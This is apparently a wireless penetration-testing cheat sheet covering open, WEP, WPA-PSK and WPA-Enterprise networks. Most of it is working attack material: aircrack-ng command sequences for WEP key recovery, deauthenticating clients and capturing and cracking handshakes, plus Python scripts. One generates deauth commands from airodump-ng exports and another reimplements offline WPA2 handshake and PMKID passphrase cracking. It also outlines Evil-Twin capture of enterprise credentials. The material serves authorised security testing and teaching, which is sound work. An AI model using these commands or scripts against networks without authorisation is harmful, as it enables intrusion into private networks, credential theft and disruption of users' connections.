# Wireless pentest

## Open network

* Usually for guest access and only gives Internet access; the guest segment is supposed to be isolated from the internal network, and checking that isolation actually holds is part of the test
* The guest either connects directly or has to authenticate through a captive portal

## WEP

* This protocol has been completely broken for many years (RC4 with a 24-bit IV that repeats, so the key leaks statistically from captured traffic) and should not be used anymore.
* We can recover the key very easily once enough IVs have been captured

```bash
# Capture traffic on the target's channel (around 30 000 IVs for a 64-bit key, more for 128-bit). -w out writes out-01.cap
airodump-ng -c 11 --bssid 60:A4:4C:20:DF:60 -w out wlan0mon
# Generate ARP traffic (ARP request replay) to collect IVs quickly. -b is the target BSSID, -h our card's MAC;
# the card must be associated with the AP for the replay to be accepted (fake authentication, aireplay-ng -1)
aireplay-ng -3 -b 60:A4:4C:20:DF:60 -h 44:60:57:C8:58:A0 wlan0mon
# Monitor the number of IVs in the #Data column of airodump-ng, then break the key (re-run as more IVs come in)
aircrack-ng out-01.cap
```

## WPA

* 2 authentication modes:
  * Personal = WPA-PSK (Pre-Shared Key) = authentication by a secret shared with everyone (like at home). Attack path: capture the 4-way handshake (or a PMKID) and crack the passphrase offline, which only succeeds if it is in the wordlist.
  * Enterprise = WPA-MGT (shown as `MGT` by airodump-ng) = 802.1X/EAP (Extensible Authentication Protocol). Many EAP methods exist (see the official list on the IANA website) but here are the most common ones:
    * PEAP: historically the default method of the native Windows supplicant; the inner MSCHAPv2 exchange carries the AD credentials, so an Evil-Twin AP (a rogue AP with the same SSID and its own RADIUS server, e.g. EAPHammer from the Tools section) captures an MSCHAPv2 challenge/response that can be cracked offline (asleap, or hashcat mode 5500).
    * EAP-TTLS: very similar; the inner method is often PAP or MSCHAPv2, so the login/password (in clear with PAP) can be recovered with the Evil-Twin attack if the clients do not validate the certificate of the access point's RADIUS server.
    * EAP-TLS: mutual authentication by certificate; there is no password to capture, so the test focuses on certificate handling and client configuration.
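The first thing the scan gives you is a list of networks in each of the categories above, and airodump-ng's CSV export (`-w outfile` writes `outfile-01.csv`) is the easiest place to sort them and to find the stations attached to each AP. The script below is an added example, not code from the original page or from the aircrack-ng suite: it reads such an export, labels every AP as open / WEP / WPA-PSK / WPA-Enterprise / WPA3-SAE and lists the stations seen on it. The sample export is constructed by hand in the column layout airodump-ng uses; columns are looked up by header name, so only the header names are assumed.

```python
"""Pick targets from an airodump-ng CSV export (airodump-ng -w outfile writes outfile-01.csv).

Added example, not code from the original page or from the aircrack-ng suite.
The sample below is constructed by hand in the column layout airodump-ng uses;
columns are looked up by header name, so only the header names are assumed.
"""
import csv
import io

# Constructed sample export: the access-point table, a blank line, then the
# station table, as airodump-ng writes them.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
60:A4:4C:20:DF:60, 2024-05-01 10:00:00, 2024-05-01 10:05:00, 11, 54, WEP, WEP, , -40, 210, 31020, 0.  0.  0.  0, 7, OldShop,
AA:BB:CC:DD:EE:01, 2024-05-01 10:00:00, 2024-05-01 10:05:00, 6, 130, WPA2, CCMP, PSK, -52, 180, 0, 0.  0.  0.  0, 9, HomeNet-5,
AA:BB:CC:DD:EE:02, 2024-05-01 10:00:00, 2024-05-01 10:05:00, 1, 130, WPA2, CCMP, MGT, -61, 150, 0, 0.  0.  0.  0, 8, CorpWiFi,
AA:BB:CC:DD:EE:03, 2024-05-01 10:00:00, 2024-05-01 10:05:00, 36, 866, OPN, , , -70, 90, 0, 0.  0.  0.  0, 5, Guest,
AA:BB:CC:DD:EE:04, 2024-05-01 10:00:00, 2024-05-01 10:05:00, 44, 866, WPA3, CCMP, SAE, -66, 95, 0, 0.  0.  0.  0, 6, NewNet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
44:60:57:C8:58:A0, 2024-05-01 10:01:00, 2024-05-01 10:05:00, -48, 320, 60:A4:4C:20:DF:60, OldShop
11:22:33:44:55:66, 2024-05-01 10:02:00, 2024-05-01 10:05:00, -55, 40, AA:BB:CC:DD:EE:01, HomeNet-5
77:88:99:AA:BB:CC, 2024-05-01 10:02:00, 2024-05-01 10:05:00, -75, 5, (not associated), CorpWiFi,Guest
"""


def _tables(text):
    """Split the export into its blank-line separated tables, one list of rows each."""
    tables, current = [], []
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not any(cell.strip() for cell in row):   # blank line = table boundary
            if current:
                tables.append(current)
                current = []
            continue
        current.append([cell.strip() for cell in row])
    if current:
        tables.append(current)
    return tables


def _as_dicts(table):
    """Map each data row onto the table's header names."""
    header, rows = table[0], table[1:]
    out = []
    for row in rows:
        record = dict(zip(header, row))
        # Probed ESSIDs are written comma separated and unquoted, so a station row
        # can have more fields than the header: fold the overflow into the last column.
        if len(row) > len(header):
            record[header[-1]] = ",".join(row[len(header) - 1:])
        out.append(record)
    return out


def classify(ap):
    """Label an access point the way the sections above group them."""
    privacy, auth = ap["Privacy"], ap["Authentication"]
    if "OPN" in privacy:
        return "open"
    if "WEP" in privacy:
        return "WEP"
    if "MGT" in auth:
        return "WPA-Enterprise"      # 802.1X/EAP: Evil-Twin territory, no PSK to crack
    if "PSK" in auth:
        return "WPA-PSK"             # includes WPA3 transition mode ("PSK SAE"): the PSK path still exists
    if "SAE" in auth:
        return "WPA3-SAE"            # no offline handshake crack
    return "unknown"


def triage(text):
    """Return {bssid: {essid, channel, mode, ivs, stations}} for every AP in the export."""
    tables = _tables(text)
    aps = _as_dicts(tables[0])
    stations = _as_dicts(tables[1]) if len(tables) > 1 else []
    result = {}
    for ap in aps:
        result[ap["BSSID"]] = {
            "essid": ap["ESSID"],
            "channel": int(ap["channel"]),
            "mode": classify(ap),
            "ivs": int(ap["# IV"]),          # only meaningful for WEP (IVs needed for cracking)
            "stations": [],
        }
    for station in stations:
        if station["BSSID"] in result:       # "(not associated)" stations are skipped
            result[station["BSSID"]]["stations"].append(station["Station MAC"])
    return result


def deauth_commands(result, bssid, iface="wlan0mon", count=1):
    """One aireplay-ng deauth line per station seen on the target (the -c value used later on this page)."""
    return [f"aireplay-ng -0 {count} -a {bssid} -c {sta} {iface}" for sta in result[bssid]["stations"]]


if __name__ == "__main__":
    targets = triage(SAMPLE_CSV)
    for bssid, t in targets.items():
        print(f"{bssid} ch{t['channel']:>3} {t['mode']:<15} {t['essid']:<12} stations={t['stations']}")
```

Run it against a real `outfile-01.csv` by passing the file contents to `triage()`; APs without any station are the ones where a deauth cannot help and the PMKID route (see the bettercap link in the resources) is the only client-less option.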

### The Hacking process

![image](https://user-images.githubusercontent.com/96747355/176039405-619013ff-b308-4ae9-8fcc-80678c51e275.png)

> *Source:* [*Practical Ethical Hacking - TCM Security*](https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)

```bash
# check that the wireless card is detected
iwconfig
# bring the interface down (the mode can only be changed while it is down)
ifconfig wlan0 down
# kill the processes that would interfere (NetworkManager, wpa_supplicant, ...)
airmon-ng check kill
# put the card in monitor mode
iwconfig wlan0 mode monitor
# bring it back up. With this method the interface keeps its name, so use wlan0 (not wlan0mon) in the commands below
ifconfig wlan0 up
```

#### OR

```bash
# check that the wireless card is detected
iwconfig
# kill the processes that would interfere (NetworkManager, wpa_supplicant, ...)
airmon-ng check kill
# put the card in monitor mode (creates the wlan0mon interface)
airmon-ng start wlan0
# check that it worked (Mode:Monitor)
iwconfig
# Find the SSIDs in our scope for the test: note the channel (CH) and the BSSID of the target
airodump-ng wlan0mon
# monitor our target for handshakes. For -c we need to specify the channel number found with the previous command and for the --bssid option the MAC address we also found. "WPA handshake: <BSSID>" appears at the top right once one is captured
airodump-ng -c <channel-number> --bssid <MAC-ADDRESS> -w outfile wlan0mon
# from a second terminal, deauth one connected station (-c, listed under STATION by airodump-ng) so that it reconnects and we capture the handshake
aireplay-ng -0 1 -a <MAC-ADDRESS> -c <MAC-ADDRESS-STATION> wlan0mon
# check our capture .cap file (-w outfile produces outfile-01.cap)
ls outfile*
# crack the handshake with a wordlist. This only works if the passphrase is in the wordlist: a long random PSK will not fall
aircrack-ng -w wordlist -b <MAC-ADDRESS> outfile-01.cap
```
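What aircrack-ng does in that last step, and what the client-less PMKID attack from the bettercap link in the resources does, is the same per-candidate computation: derive the PMK from the passphrase and SSID, then check it against something the capture contains (the MIC of an EAPOL message, or the PMKID). The script below is an added example, not code from the original page, aircrack-ng or bettercap, and re-implements that check in Python so the mechanics are visible. The "capture" (SSID, MACs, nonces, passphrase, wordlist) is constructed in the file from a known passphrase so that it runs offline; with a real capture the ANonce comes from message 1, the SNonce and MIC from message 2, and the PMKID from message 1's key data.

```python
"""Offline WPA2-PSK recovery from a captured 4-way handshake or a PMKID.

Added example, not code from the original page or from aircrack-ng/bettercap:
it re-implements the per-candidate derivation those tools run. The "capture"
below is constructed in this file from a known passphrase so it runs offline.
"""
import hashlib
import hmac

MIC_OFFSET = 81   # EAPOL header (4) + descriptor type, key info, key length, replay counter, nonce, IV, RSC, ID (77)


def pmk_from_passphrase(passphrase, ssid):
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits). This is the
    # expensive step; the SSID salt is why precomputed tables only cover common SSIDs.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk, aa, spa, anonce, snonce):
    # IEEE 802.11 PRF-512 over "Pairwise key expansion" ||
    # min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]           # the KCK is the first 16 bytes, the only part the MIC needs


def eapol_mic(kck, eapol, version):
    # MIC over the whole EAPOL-Key frame with the MIC field zeroed:
    # key descriptor version 1 (WPA/TKIP) = HMAC-MD5, version 2 (WPA2/CCMP) = HMAC-SHA1-128.
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def pmkid(pmk, aa, spa):
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): sent by the AP in message 1,
    # so it can be cracked without any client connected (the client-less attack).
    return hmac.new(pmk, b"PMK Name" + aa + spa, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, aa, spa, anonce, snonce, eapol, wordlist):
    """Return the passphrase whose KCK reproduces the captured MIC, or None."""
    version = eapol[6] & 0x07                 # low 3 bits of the Key Information field
    captured = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol, version), captured):
            return candidate
    return None


def crack_pmkid(ssid, aa, spa, captured_pmkid, wordlist):
    """Same idea without a handshake: one HMAC per candidate on top of the PBKDF2."""
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(candidate, ssid), aa, spa), captured_pmkid):
            return candidate
    return None


# --- constructed sample capture (assumed values, not from a real network) ---
SSID = "HomeNet-5"
AA = bytes.fromhex("aabbccddee01")            # AP BSSID
SPA = bytes.fromhex("112233445566")           # client (station) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PSK = "summer2024!"                      # only used to build the sample
WORDLIST = ["password", "12345678", "HomeNet-5", "summer2024!", "letmein1"]


def build_eapol_msg2(snonce, version=2, mic=b"\x00" * 16):
    # Minimal EAPOL-Key message 2 (RSN descriptor): key info = version | pairwise | MIC,
    # key length 16 (CCMP), replay counter 1, zero IV/RSC/ID, empty key data.
    key_info = 0x0108 | version
    body = (bytes([2]) + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big")
            + (1).to_bytes(8, "big") + snonce + b"\x00" * 32 + mic + b"\x00\x00")
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body


def build_sample_capture():
    """Message 2 with a valid MIC, and the PMKID, as a real capture would provide them."""
    pmk = pmk_from_passphrase(TRUE_PSK, SSID)
    kck = ptk(pmk, AA, SPA, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_msg2(SNONCE)
    return build_eapol_msg2(SNONCE, mic=eapol_mic(kck, unsigned, 2)), pmkid(pmk, AA, SPA)


if __name__ == "__main__":
    eapol, pid = build_sample_capture()
    print("handshake:", crack_handshake(SSID, AA, SPA, ANONCE, SNONCE, eapol, WORDLIST))
    print("pmkid:    ", crack_pmkid(SSID, AA, SPA, pid, WORDLIST))
```

The PBKDF2 step is where all the time goes (4096 HMAC-SHA1 rounds per candidate), which is why the wordlist quality decides the outcome and why a 20+ character random PSK is out of reach: the handshake and PMKID checks on top of it are a handful of HMACs each.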

## Tools

* [Wifite](https://github.com/derv82/wifite2)
* [Fluxion](https://github.com/FluxionNetwork/fluxion)
* [EAPHammer](https://github.com/s0lst1c3/eaphammer)

## Equipment

* The following equipment can be used for wifi pentest (the card must support monitor mode and packet injection on the bands in scope, 2.4 GHz and 5 GHz):
  * Alfa AWUS036NH wireless card
  * Alfa AWUS1900
  * Alfa AWUS036ACH
  * Alfa AWUS052NH
  * Alfa AWUS051NH
  * Alfa AWUS036NHR
  * TP-Link TL-WN722N (v1 works out of the box; later revisions use a Realtek chipset that needs an out-of-tree driver)
  * Hak5 Pineapple Nano Basic
  * Flipper Zero along with the wifi dev board

## Resources

{% embed url="https://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet/" %}
Wireless pentest checklist
{% endembed %}

{% embed url="https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/" %}
Pwning WPA/WPA2 networks with bettercap and the PMKID client-less attack - on evilsocket
{% endembed %}

{% embed url="https://www.aircrack-ng.org/doku.php?id=cracking_wpa" %}
How to Crack WPA/WPA2
{% endembed %}

{% embed url="https://www.wirelesshack.org/" %}
WirelesSHack
{% endembed %}

{% embed url="https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course" %}
Practical Ethical Hacking - TCM Security
{% endembed %}
